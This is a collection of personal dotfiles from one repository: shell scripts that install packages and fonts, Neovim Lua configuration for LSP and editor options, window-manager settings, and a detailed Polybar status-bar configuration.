"alphanum_fraction": 0.7206477522850037, "avg_line_length": 29.875, "blob_id": "87429ce9411feb4d06084e79d8df29c54de17f50", "content_id": "94438156f399783a690374fdf3a1d074527a65a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 247, "license_type": "no_license", "max_line_length": 83, "num_lines": 8, "path": "/source-code-pro.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", 
"text": "#!/bin/bash\nmkdir /tmp/adodefont\ncd /tmp/adodefont\nwget https://github.com/adobe-fonts/source-code-pro/archive/2.010R-ro/1.030R-it.zip\nunzip 1.030R-it.zip\nmkdir -p ~/.fonts\ncp source-code-pro-2.010R-ro-1.030R-it/OTF/*.otf ~/.fonts/\nfc-cache -f -v\n" }, { "alpha_fraction": 0.6394635438919067, "alphanum_fraction": 0.6394635438919067, "avg_line_length": 40.89523696899414, "blob_id": "1b23871ccf24be59648c6d73f0b4f18e25a4f8fa", "content_id": "af241f156023845d098240218d673296a08fee76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 4407, "license_type": "no_license", "max_line_length": 181, "num_lines": 105, "path": "/nvim/oldconfig/lua/nvim-lspconfig.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "require(\"mason\").setup()\nrequire(\"mason-lspconfig\").setup({\n ensure_installed = { \"sumneko_lua\", \"rust_analyzer\" }\n})\nlocal function on_attach(client, bufnr)\n\tlocal function buf_set_keymap(...)\n\t\tvim.api.nvim_buf_set_keymap(bufnr, ...)\n\tend\n\tlocal function buf_set_option(...)\n\t\tvim.api.nvim_buf_set_option(bufnr, ...)\n\tend\n\n\tbuf_set_option(\"omnifunc\", \"v:lua.vim.lsp.omnifunc\")\n\n\t-- Mappings.\n\tlocal opts = { noremap = true, silent = true }\n\n\tbuf_set_keymap(\"n\", \"gD\", \"<Cmd>lua vim.lsp.buf.declaration()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"gd\", \"<Cmd>lua vim.lsp.buf.definition()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"K\", \"<Cmd>lua vim.lsp.buf.hover()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"gi\", \"<cmd>lua vim.lsp.buf.implementation()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<C-k>\", \"<cmd>lua vim.lsp.buf.signature_help()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>wa\", \"<cmd>lua vim.lsp.buf.add_workspace_folder()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>wr\", \"<cmd>lua vim.lsp.buf.remove_workspace_folder()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>wl\", \"<cmd>lua print(vim.inspect(vim.lsp.buf.list_workspace_folders()))<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>D\", \"<cmd>lua vim.lsp.buf.type_definition()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>rn\", \"<cmd>lua vim.lsp.buf.rename()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"gr\", \"<cmd>Trouble lsp_references<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>e\", \"<cmd>lua vim.lsp.diagnostic.show_line_diagnostics()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"[d\", \"<cmd>lua vim.lsp.diagnostic.goto_prev()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"]d\", \"<cmd>lua vim.lsp.diagnostic.goto_next()<CR>\", opts)\n\tbuf_set_keymap(\"n\", \"<space>q\", \"<cmd>lua vim.lsp.diagnostic.set_loclist()<CR>\", opts)\n\n\tbuf_set_keymap(\"n\", \"<Leader>mo\", [[<Cmd>lua require('telescope.builtin').lsp_document_symbols()<CR>]], opts)\n\tbuf_set_keymap(\"n\", \"<Leader>gr\", [[<Cmd>lua require('telescope.builtin').lsp_references()<CR>]], opts)\n\tbuf_set_keymap(\"n\", \"<Leader>gi\", [[<Cmd>lua require('telescope.builtin').lsp_implementations()<CR>]], opts)\n buf_set_keymap('n', '<space>rn', '<cmd>lua vim.lsp.buf.rename()<CR>', opts)\n\tbuf_set_keymap(\"n\", \"<space>f\", \"<cmd>lua vim.lsp.buf.formatting()<CR>\", opts)\n\n\t-- Set some keybinds conditional on server capabilities\n\tif client.server_capabilities.document_formatting then\n\t\tbuf_set_keymap(\"n\", \"<space>f\", \"<cmd>lua vim.lsp.buf.formatting()<CR>\", opts)\n\telseif client.server_capabilities.document_range_formatting then\n\t\tbuf_set_keymap(\"n\", \"<space>f\", \"<cmd>lua vim.lsp.buf.range_formatting()<CR>\", 
opts)\n\tend\nend\n\n-- lspInstall + lspconfig stuff\n\nlocal function setup_servers()\n\tlocal capabilities = vim.lsp.protocol.make_client_capabilities()\n\t-- For autoimport in rust analyzer\n\tcapabilities.textDocument.completion.completionItem.resolveSupport = {\n\t\tproperties = {\n\t\t\t\"additionalTextEdits\",\n\t\t},\n\t}\n require('lspconfig')['rust_analyzer'].setup{\n capabilities = capabilities,\n on_attach = on_attach,\n\t\tsettings = {\n\t\t\t[\"rust-analyzer\"] = {\n\t\t\t\tdiagnostics = {\n\t\t\t\t\tenable = false,\n\t\t\t\t},\n\t\t\t\tcheckOnSave = {\n\t\t\t\t\tcommand = \"clippy\",\n\t\t\t\t},\n workspace = {\n symbol = {\n search = {\n kind = \"all_symbols\"\n }\n }\n }\n\t\t\t},\n\t\t},\n\t\thandlers = {\n\t\t\t[\"textDocument/publishDiagnostics\"] = vim.lsp.with(vim.lsp.diagnostic.on_publish_diagnostics, {\n\t\t\t\tvirtual_text = true,\n\t\t\t\tsigns = false,\n\t\t\t\tupdate_in_insert = false,\n\t\t\t}),\n\t\t},\n }\n require('lspconfig')['clangd'].setup{}\nend\n\nsetup_servers()\n\nrequire(\"lsp_extensions\").inlay_hints({\n\thighlight = \"Comment\",\n\tprefix = \" > \",\n\taligned = false,\n\tonly_current_line = false,\n\tenabled = { \"TypeHint\", \"ChainingHint\", \"ParameterHint\" },\n})\n--vim.api.nvim_command([[\n-- autocmd BufEnter,BufWinEnter,TabEnter *.rs :lua require'lsp_extensions'.inlay_hints{ prefix = '', highlight = \"Comment\", enabled = {\"TypeHint\", \"ChainingHint\", \"ParameterHint\"}}\n--]])\n\nvim.fn.sign_define(\"LspDiagnosticsSignError\", { text = \"\", numhl = \"LspDiagnosticsDefaultError\" })\nvim.fn.sign_define(\"LspDiagnosticsSignWarning\", { text = \"\", numhl = \"LspDiagnosticsDefaultWarning\" })\nvim.fn.sign_define(\"LspDiagnosticsSignInformation\", { text = \"\", numhl = \"LspDiagnosticsDefaultInformation\" })\nvim.fn.sign_define(\"LspDiagnosticsSignHint\", { text = \"\", numhl = \"LspDiagnosticsDefaultHint\" })\n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5327869057655334, "avg_line_length": 19.33333396911621, "blob_id": "b48cf2dcfef1290f4da5c7fb738fcff820f9189c", "content_id": "e9811b346ceb30a309f9ca1a54b24da60aa3b767", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 122, "license_type": "no_license", "max_line_length": 31, "num_lines": 6, "path": "/awesome/config/apps.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "return {\n screenshot = \"i3-scrot -s\",\n terminal = \"kitty -e tmux\",\n -- terminal = \"kitty\",\n editor = \"nvim\"\n}\n" }, { "alpha_fraction": 0.7055837512016296, "alphanum_fraction": 0.7055837512016296, "avg_line_length": 23.625, "blob_id": "2439f61130f2818c1eebfd3661ab50e6b44c7cb8", "content_id": "33220b096b7c9ae3827f8462675972f7a810764c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 197, "license_type": "no_license", "max_line_length": 70, "num_lines": 8, "path": "/penrose/scripts/run-penrose.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nwhile true; do\n # log out to a file\n /home/maik/dotfiles/penrose/target/release/penrose &> ~/.penrose.log\n mv ~/.penrose.log ~/prev-penrose.log\n export RESTARTED=true\ndone\n" }, { "alpha_fraction": 0.6571428775787354, "alphanum_fraction": 0.6571428775787354, "avg_line_length": 34, "blob_id": "705f5763e006b6137140816af27a2367a46503c8", "content_id": "3607bdbc14df45ea7afcb3cd92e9179c9450043d", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Shell", "length_bytes": 35, "license_type": "no_license", "max_line_length": 34, "num_lines": 1, "path": "/install_pacman.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "pacman -S --needed - < pkglist.txt\n" }, { "alpha_fraction": 0.5408163070678711, "alphanum_fraction": 0.5476190447807312, "avg_line_length": 15.771428108215332, "blob_id": "a22f5d09f466d8a5e09da35ab80ab4cf2c3e75d1", "content_id": "e20333f85b0070eb00e0e119d8834b215862b298", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 588, "license_type": "no_license", "max_line_length": 66, "num_lines": 35, "path": "/dependencies-arch.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "sudo pacman -Syu\nsudo pacman -S \\\n git \\\n vim \\\n wget \\\n cmake \\\n make \\\n rofi \\\n pavucontrol \\\n emacs \\\n rxvt-unicode \\\n tmux \\\n compton \\\n nitrogen \\\n neovim \\\n zsh \\\n curl \\\n i3-wm \\\n steam \\\n feh \\\n scrot \\\n gimp \\\n peek \\\n xclip \\\n bspwm \\\n powerline-fonts \\\n freetype2 \\\n fontconfig \\\n pkg-config \\\n\ngit clone https://github.com/syl20bnr/spacemacs /tmp/.emacs.d\ncp -f -R /tmp/.emacs.d ~/.emacs.d\n\ngit clone https://github.com/robbyrussell/oh-my-zsh /tmp/oh-my-zsh\ncp -f -R /tmp/oh-my-zsh ~/oh-my-zsh\n\n" }, { "alpha_fraction": 0.7122950553894043, "alphanum_fraction": 0.7270491719245911, "avg_line_length": 21.592592239379883, "blob_id": "edbd91e21bea9060ca988c1d4353e354d37e80d0", "content_id": "e0af16bf15e2b4ca586fa5d6a7af5da76db011c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 1222, "license_type": "no_license", "max_line_length": 60, "num_lines": 54, "path": "/nvim/oldconfig/lua/options.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local vim = vim\nlocal opt = vim.opt\nlocal g = vim.g\nlocal cmd = vim.cmd\n\nopt.ruler = false\nopt.hidden = true\nopt.ignorecase = true\nopt.splitbelow = true\nopt.splitright = true\nopt.termguicolors = true\nopt.cul = true\nopt.mouse = \"a\"\nopt.signcolumn = \"no\"\nopt.cmdheight = 1\nopt.updatetime = 250 -- update interval for gitsigns\nopt.timeoutlen = 400\nopt.expandtab = true\nopt.shiftwidth = 2\nopt.smartindent = true\nopt.whichwrap:append(\"<>hl\")\nopt.pumheight = 20\nopt.foldmethod = \"manual\"\nopt.list = true\nopt.smartindent = true\nopt.expandtab = true\nopt.syntax = \"on\"\nopt.shiftwidth = 4\nopt.tabstop = 4\nopt.virtualedit = \"\"\nopt.number = true\nopt.relativenumber = true\n\ng.mapleader = \" \"\ng.auto_save = 0\ng.backspace = \"eol,start,indent\"\ng.whichwrap = \"<,>,h,l\"\ng.indentLine_enabled = 1\ng.indent_blankline_char = \"▏\"\n\ng.indent_blankline_filetype_exclude = { \"help\", \"terminal\" }\ng.indent_blankline_buftype_exclude = { \"terminal\" }\n\ng.indent_blankline_show_trailing_blankline_indent = false\ng.indent_blankline_show_first_indent_level = false\n\ncmd(\"set tm=2000\")\ncmd(\"set smarttab\")\ncmd(\"set noswapfile\")\n\nopt.background = \"dark\"\ng.tokyonight_transparent_sidebar = true\ng.tokyonight_transparent = true\ncmd(\"colorscheme tokyonight\")\n" }, { "alpha_fraction": 0.6093294620513916, "alphanum_fraction": 0.6195335388183594, "avg_line_length": 19.147058486938477, "blob_id": "4c64d3a859797fb4fec5072641b342803899537f", "content_id": "ff6a1aca95949218d054faf16033090e57597ef9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 686, "license_type": "no_license", 
"max_line_length": 66, "num_lines": 34, "path": "/dependencies.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "sudo add-apt-repository ppa:peek-developers/stable\nsudo add-apt-repository ppa:neovim-ppa/stable\nsudo add-apt-repository ppa:daveg/i3-gaps\nsudo apt update\nsudo apt install \\\n git \\\n vim \\\n wget \\\n cmake \\\n make \\\n rofi \\\n pavucontrol \\\n emacs \\\n rxvt-unicode-256color \\\n tmux \\\n compton \\\n nitrogen \\\n software-properties-common \\\n neovim \\\n zsh \\\n curl \\\n i3-wm \\\n steam \\\n feh \\\n scrot \\\n gimp \\\n peek \\\n xclip \\\n\ngit clone https://github.com/syl20bnr/spacemacs /tmp/.emacs.d\ncp -f -R /tmp/.emacs.d ~/.emacs.d\n\ngit clone https://github.com/robbyrussell/oh-my-zsh /tmp/oh-my-zsh\ncp -f -R /tmp/oh-my-zsh ~/oh-my-zsh\n\n" }, { "alpha_fraction": 0.6289411783218384, "alphanum_fraction": 0.6777722239494324, "avg_line_length": 20.80499267578125, "blob_id": "90d7abed9dcc812267f49bc205d42d1ddc044c4b", "content_id": "10d0742d07b5d94dcc9952660f5cf7275d1bec9c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 14173, "license_type": "no_license", "max_line_length": 170, "num_lines": 641, "path": "/polybar/.config/polybar/config", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": " ;=====================================;\n ; ____ _ _ ;\n ;| _ \\ ___ | |_ _| |__ __ _ _ __ ;\n ;| |_) / _ \\| | | | | '_ \\ / _` | '__|;\n ;| __/ (_) | | |_| | |_) | (_| | | ;\n ;|_| \\___/|_|\\__, |_.__/ \\__,_|_| ;\n ; |___/ ;\n ;=====================================;\n\n[colors]\nbackground = #1c2c43\nbackground-alt = #0e1827\nforeground = #FEFEFE\nforeground-alt = #9ac4ff\nprimary = #fff\nsecondary = #a9b3c2\nbackground-level= #cec8d8ff\nalert = #ff004b\n\n[bar/level]\nwidth = 19%\nheight = 4.3%\noffset-x = 40.5%\noffset-y = 5%\nradius = 22\nfixed-center = true\nbottom = false\n\nbackground = ${colors.background-level}\nforeground = ${colors.background}\n\npadding-left = 2\npadding-right = 2\n\nmodule-margin-left = 0\nmodule-margin-right = 1\n \nfont-0 = UbuntuMono Nerd Font:pixelsize=14:style=Medium Condensed;5\nfont-1 = Material Design Icons Desktop:pixelsize=20;5\nfont-2 = UbuntuMono Nerd Font:pixelsize=20:style=Medium Condensed;7\n \nmodules-center = xbacklight pulseaudio\n\noverride-redirect = true\nenable-ipc = true\n\n[bar/control]\nwidth = 8%\nheight = 4.3%\noffset-x = 0%:10\noffset-y = 0.65%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background}\nforeground = ${colors.foreground}\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 0\npadding-right = 0\n\nmodule-margin-left = 2\nmodule-margin-right = 2\n \nfont-0 = BreezeSans:pixelsize=14:style=Medium Condensed;4\nfont-1 = Material Design Icons Desktop:pixelsize=20;5\nfont-2 = BreezeSans:pixelsize=10:style=Bold Condensed;3\n \nmodules-center = search screenshot file-man \n\nwm-restack = bspwm\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/workspace]\nwidth = 24%\nheight = 4.85%\noffset-x = 8%:10\noffset-y = 0%\nradius = 0\nfixed-center = true\nbottom = true\n\nbackground = #00000000\nforeground = ${colors.foreground}\n\npadding-left = 2\npadding-right = 0\n\nmodule-margin-left = 0\nmodule-margin-right = 0\n \nfont-0 = Material Design Icons Desktop:pixelsize=26;1\nfont-1 = BreezeSans:pixelsize=28:style=Regular Condensed;-2\nfont-2 = Material Design Icons Desktop:pixelsize=18;-10\n \nmodules-left = 
bspwm\n\nwm-restack = bspwm\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/music]\nwidth = 30%\nheight = 4.3%\noffset-x = 35%\noffset-y = 6%:1\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = #00191414\nforeground = #fff\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 2\npadding-right = 2\n\nmodule-margin-left = 0\nmodule-margin-right = 0\n \nfont-0 = BreezeSans:pixelsize=16:style=Medium Condensed;2\nfont-1 = Font Awesome 5 Pro:pixelsize=20:style=Solid;3\nfont-2 = Font Awesome 5 Brands:pixelsize=21;3\nfont-3 = SourceHanSansJP:pixelsize=14:style=Medium;2\nfont-4 = Font Awesome 5 Pro:pixelsize=18:style=Solid;3\nfont-5 = UbuntuMono Nerd Font Mono:pixelsize=36:style=Medium Condensed;7\nfont-6 = Noto Sans Mono:pixelsize=14:style=Medium;2\nfont-7 = BreezeSans:pixelsize=14:style=Medium Condensed;2\n \nmodules-center = right song left\n\noverride-redirect = true\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\n\n[bar/player]\nwidth = 11%\nheight = 4.3%\noffset-x = 44.5%\noffset-y = 0.65%\nradius = 22 \nfixed-center = true\nbottom = true\n\nbackground = ${colors.background-alt}\nforeground = ${colors.foreground-alt}\n\nborder-size = 0\n\npadding-left = 6\npadding-right = 6\n\nmodule-margin-left = 2\nmodule-margin-right = 3\n \nfont-0 = BreezeSans:pixelsize=16:style=Medium Condensed;2\nfont-1 = Font Awesome 5 Pro:pixelsize=20:style=Regular;3\nfont-2 = Font Awesome 5 Brands:pixelsize=21;3\nfont-3 = SourceHanSansJP:pixelsize=14:style=Medium;2\nfont-4 = Font Awesome 5 Pro:pixelsize=18:style=Solid;3\n \nmodules-left = info\nmodules-center = prev toggle next\n\nwm-restack = bspwm\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/close]\nwidth = 2.35%\nheight = 4.1%\noffset-x = 65.65%:-40\noffset-y = 0.75%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background-alt}\nforeground = ${colors.primary}\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 0\npadding-right = 0\n\nmodule-margin-left = 0\nmodule-margin-right = 0\n \nfont-0 = Material Design Icons Desktop:pixelsize=22;5\nfont-1 = BreezeSans:pixelsize=18:style=Medium Condensed;2\n \nmodules-center = close-menu \n\nwm-restack = bspwm\n\ncursor-click = pointer\ncursor-scroll = default\n\nclick-left = ~/.config/polybar/scripts/close.sh &\n\n[bar/notify]\nwidth = 14%\nheight = 4.3%\noffset-x = 68%:-30\noffset-y = 0.65%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background-alt}\nforeground = ${colors.foreground-alt}\n\nborder-size = 0\nborder-color = #000\n\npadding = 0\n\nmodule-margin-left = 2\nmodule-margin-right = 3\n \nfont-0 = BreezeSans:pixelsize=10:style=Bold;-10\nfont-1 = Material Design Icons Desktop:pixelsize=22;5\nfont-2 = BreezeSans:pixelsize=10:style=Light Condensed;10\nfont-3 = Material Design Icons Desktop:pixelsize=10;10\nfont-4 = Material Design Icons Desktop:pixelsize=10;-8\nfont-5 = icomoon:pixelsize=17;4\n\nmodules-center = cpu update news mtorrent\n\nwm-restack = bspwm\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/open]\nwidth = 2.35%\nheight = 4.1%\noffset-x = 79.65%:-30\noffset-y = 0.75%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background-alt}\nforeground = ${colors.primary}\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 0\npadding-right = 0\n\nmodule-margin-left = 0\nmodule-margin-right = 0\n \nfont-0 = 
Material Design Icons Desktop:pixelsize=22;5\nfont-1 = BreezeSans:pixelsize=18:style=Medium Condensed;2\n \nmodules-center = open-menu \n\nwm-restack = bspwm\n\ncursor-click = pointer\ncursor-scroll = default\n\nclick-left = ~/.config/polybar/scripts/open.sh &\n\n[bar/status]\nwidth = 16%\nheight = 4.3%\noffset-x = 82.0%:-20\noffset-y = 0.65%\nradius = 22\nfixed-center = true\nbottom = true\n\nbackground = ${colors.background}\nforeground = ${colors.foreground}\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 0\npadding-right = 0\n\nmodule-margin-left = 1\nmodule-margin-right = 1\n \nfont-0 = BreezeSans:pixelsize=14:style=Medium Condensed;4\nfont-1 = Material Design Icons Desktop:pixelsize=21;5\nfont-2 = BreezeSans:pixelsize=10:style=Bold Condensed;3\n \nmodules-center = wlan battery bluetooth date \n\nwm-restack = bspwm\n\ncursor-click = pointer\ncursor-scroll = default\n\n[bar/power]\nwidth = 2.1%\nheight = 3.7%\noffset-x = 97.9%:-10\noffset-y = 0.88%\nradius = 20\nfixed-center = true\nbottom = true\n\nbackground = ${colors.alert}\nforeground = #fff\n\nborder-size = 0\nborder-color = #000\n\npadding-left = 5\npadding-right = 0\n\nmodule-margin-left = 1\nmodule-margin-right = 1\n \nfont-0 = Material Design Icons Desktop:pixelsize=23;6\n \nmodules-center = power-menu \n\nwm-restack = bspwm\n\nscroll-up = bspwm-desknext\nscroll-down = bspwm-deskprev\n\ncursor-click = pointer\ncursor-scroll = default\n\nclick-left = ~/.config/polybar/scripts/power-menu.sh &\n\n[module/bspwm]\ntype = internal/bspwm\n\nreverse-scroll = false\nenable-scroll = false\n\nws-icon-0 = I;%{A3:alacritty &:}󰆍%{A}\nws-icon-1 = II;%{F#00c0ff}%{A3:qutebrowser &:}󰇧%{A}%{F-}\nws-icon-2 = III;%{F#ff004b}%{A3:grep \" T \" /tmp/mpv-wpf.txt | tail -1 | cut -d' ' -f2| xargs -L1 -I[] xdotool key --window \"[]\" p &:}󰄘%{A}%{F-}\nws-icon-3 = IV;%{F#ffca00}%{A3:start-newsboat.sh &:}󰇰%{A}%{F-}\nws-icon-4 = V;%{F#2944f2}%{A3:start-vim.sh -c &:}󰹻%{A}%{F-}\nws-icon-5 = VI;%{F#c46a4b}%{A3:zathura &:}󰉨%{A}%{F-}\nws-icon-6 = VII;%{F#ff93aa}%{A3:gimp &:}󰿁%{A}%{F-}\nws-icon-7 = VIII;%{F#FF8C00}%{A3:retroarch &:}󰊠%{A}%{F-}\nws-icon-8 = IX;%{F#d448ff}%{A3:discord &:}󰆉%{A}%{F-}\nws-icon-9 = X;%{F#05d183}%{A3:start-spotify || playerctl -p spotify play-pause &:}󰫔%{A}%{F-}\nws-icon-default =%{F#9e43ba}%{A3:<!!>:}󰗹%{A}%{F-}\n\nformat = \"<label-state>\" \n\nlabel-focused =\"{%{A1:bspc node -f next.local.!floating:}%{A2:xdo close:}%icon%%{A}%{A}} \"\nlabel-focused-padding = 0\n\nlabel-occupied =\"%icon% \"\nlabel-occupied-padding = 0\n\nlabel-urgent =\"%icon%%{F#ff004b}%{T3}%{O-12}󰀨 %{T-}%{F-}\"\nlabel-urgent-foreground = ${colors.alert}\nlabel-urgent-padding = 0\n\nlabel-empty =\nlabel-empty-padding = 0\n\n[module/xbacklight]\ntype = internal/xbacklight\n\nformat = <label><bar>\nlabel = \"󰃠 \"\nlabel-foreground = ${colors.background}\n\nbar-width = 13\nbar-indicator = \"%{T3}%{T-}\"\nbar-indicator-foreground = ${colors.background}\nbar-indicator-font = 2\nbar-fill = \nbar-fill-font = 2\nbar-fill-foreground = ${colors.background}\nbar-empty = \nbar-empty-font = 2\nbar-empty-foreground = #607290\n\n[module/wlan]\ntype = internal/network\ninterface = wlp58s0\ninterval = 3.0\n\nformat-connected =<ramp-signal>\nlabel-connected = %essid%\n\nlabel-disconnected = 󰤭\nlabel-disconnected-foreground = #6c809e\n\nramp-signal-0 = %{F#ff004b}󰤫%{F-}\nramp-signal-1 = %{F#ffd200}󰤟%{F-}\nramp-signal-2 = 󰤢\nramp-signal-3 = 󰤥\nramp-signal-4 = 󰤨\nramp-signal-foreground = ${colors.foreground-alt}\n\n[module/pulseaudio]\ntype = internal/pulseaudio\n\nformat-volume = 
<label-volume><bar-volume>\nlabel-volume = \"󰎇 \"\nlabel-volume-foreground = ${root.foreground}\n\nlabel-muted = 󰎊 Muted\nlabel-muted-foreground = #607290\n\nbar-volume-width = 13\nbar-volume-foreground-0 = ${colors.background}\nbar-volume-foreground-1 = ${colors.background}\nbar-volume-foreground-2 = ${colors.background}\nbar-volume-foreground-3 = ${colors.background}\nbar-volume-foreground-4 = #fb8720\nbar-volume-foreground-5 = #fb5a20\nbar-volume-foreground-6 = #fb2020\nbar-volume-gradient = false\nbar-volume-indicator = \"%{T3}%{T-}\"\nbar-volume-indicator-font = 2\nbar-volume-fill = \nbar-volume-fill-font = 2\nbar-volume-empty = \nbar-volume-empty-font = 2\nbar-volume-empty-foreground = #607290\n\n[module/battery]\ntype = internal/battery\nbattery = BAT0\nadapter = AC\nfull-at = 98\n\nformat-charging = %{T3}<label-charging>%{T-}<animation-charging> \n\nformat-discharging = %{T3}<label-discharging>%{T-}<ramp-capacity>\n\nformat-full = %{T3}100%%{T-}󰂄\nformat-full-foreground = ${colors.foreground-alt}\n\nanimation-charging-0 = 󱊤\nanimation-charging-1 = 󱊥\nanimation-charging-2 = 󱊦\nanimation-charging-foreground = ${colors.foreground-alt}\nanimation-charging-framerate = 900\n\nramp-capacity-0 = %{F#ff004b}󰂃%{F-}\nramp-capacity-1 = %{F#ff5300}󰁺%{F-}\nramp-capacity-2 = %{F#ff8000}󰁻%{F-}\nramp-capacity-3 = %{F#ffd200}󰁼%{F-}\nramp-capacity-4 = 󰁽\nramp-capacity-5 = 󰁾\nramp-capacity-6 = 󰁿\nramp-capacity-7 = 󰂀\nramp-capacity-8 = 󰂁\nramp-capacity-9 = 󰂂\nramp-capacity-10 = 󰁹 \nramp-capacity-foreground = ${colors.foreground-alt}\nramp-capacity-framerate = 750\n\n[module/search]\ntype = custom/script\nexec = echo \"󰍉\"\nclick-left = ~/.config/polybar/scripts/search.sh &\n\n[module/file-man]\ntype = custom/script\nexec = echo \"󰉋\"\nclick-left = toggle-lf.sh &\n\n[module/screenshot]\ntype = custom/script\nexec = echo \"󰨤\"\n\nclick-right = scrot \"$(date +%s).png\" -e 'mv \"$f\" ~/Pictures/Screenshots/ && dunstify -r \"991030\" \"Say cheese...\" \"$f\" -a scrot' &\n\nclick-left = image=$(date +%s).png && maim -s -s -b 5.0 -p -5 -c 1,0,0.294 \"$HOME/Pictures/Screenshots/$image\" && dunstify -r \"991030\" \"Say cheese...\" \"$image\" -a scrot &\n\n[module/prev]\ntype = custom/script\nexec = echo \"%{T5}%{T-}\" &\nformat = \"%{F#e5efff}<label>%{F-}\"\ninterval = 600\ntail = true\n\nclick-left = playerctl --player=spotify previous &\n\n[module/info]\ntype = custom/script\nexec = echo \"\" &\ninterval = 600\ntail = true\n\nclick-left = ~/.config/polybar/scripts/info.sh 2>/dev/null &\nclick-right = bspc desktop -f '^10'\n\n[module/toggle]\ntype = custom/script\nexec = [[ \"$(playerctl -p spotify status 2>/dev/null)\" == \"Playing\" ]] && echo \"\" || echo \"\"\ninterval = 0.2\n\ntail = true\nclick-left = playerctl --player=spotify play-pause &\n\n[module/right]\ntype = custom/text\ncontent-background = #00000000\ncontent-foreground = #df191414\ncontent = \"\"\n\n[module/song]\ntype = custom/script\nexec = ~/.config/polybar/scripts/song.sh 2>/dev/null || echo \"No player found\"\nformat = \"<label> \"\nformat-prefix = \"%{F#1db954}  %{F-}\"\nformat-background = #df191414\ninterval = 600\n\ntail = true\nclick-left = bspc desktop -f ^10 &\n\n[module/left]\ntype = custom/text\ncontent-background = #00000000\ncontent-foreground = #df191414\ncontent =\"\"\n\n[module/next]\ntype = custom/script\nexec = echo \"%{T5}%{T-}\" &\nformat = \"%{F#e5efff}<label>%{F-}\"\ninterval = 600\n\ntail = true\nclick-left = playerctl --player=spotify next &\n\n[module/close-menu]\ntype = custom/script\nexec = echo 
\"%{O2}󰅂\" &\ninterval = 600\n\ntail = true\n\n[module/cpu]\ntype = custom/script\nexec = ~/.config/polybar/scripts/cpu.sh 2> /dev/null || echo \"%{T5}%{F#dae1ec}󰓦%{T4}%{O-13}󰓦%{T-}%{F-}\" \nformat-prefix = \" \"\nformat-foreground = ${colors.secondary}\n\ninterval = 1\ntail = true\n\nclick-left = pgrep gotop && xdotool search --name \"gotop\" windowactivate || alacritty -t gotop -e gotop &\n\n[module/update]\ntype = custom/script\nexec = ~/.config/polybar/scripts/update.sh 2> /dev/null || echo \"󰏗%{T5}%{F#dae1ec}󰓦%{T4}%{O-13}󰓦%{T-}%{F-}\"\nformat-foreground = ${colors.secondary}\ninterval = 1\n\ntail =true\n\n[module/news]\ntype = custom/script\nexec = ~/.config/polybar/scripts/news.sh 2> /dev/null || echo \"󰋻%{T5}%{F#dae1ec}󰓦%{T4}%{O-13}󰓦%{T-}%{F-}\"\nformat-foreground = ${colors.secondary}\ninterval = 1\n\ntail = true\nclick-left = start-newsboat.sh &\n\n[module/mtorrent]\ntype = custom/script\nexec = echo \"󱋌 \" || echo \"󱋖 \" \nformat-foreground = ${colors.secondary}\ninterval = 1\n\ntail = true\n\n[module/open-menu]\ntype = custom/script\nexec = echo \"%{O-3}󰅁\"\ninterval = 600\n\ntail = true\n\n[module/bluetooth]\ntype = custom/script\nexec = ~/.config/polybar/scripts/bluetooth-status.sh &\nformat-foreground = ${colors.foreground-alt}\ninterval = 0.5\n\ntail = true\nclick-left = ~/.config/polybar/scripts/bluetooth-status.sh -t 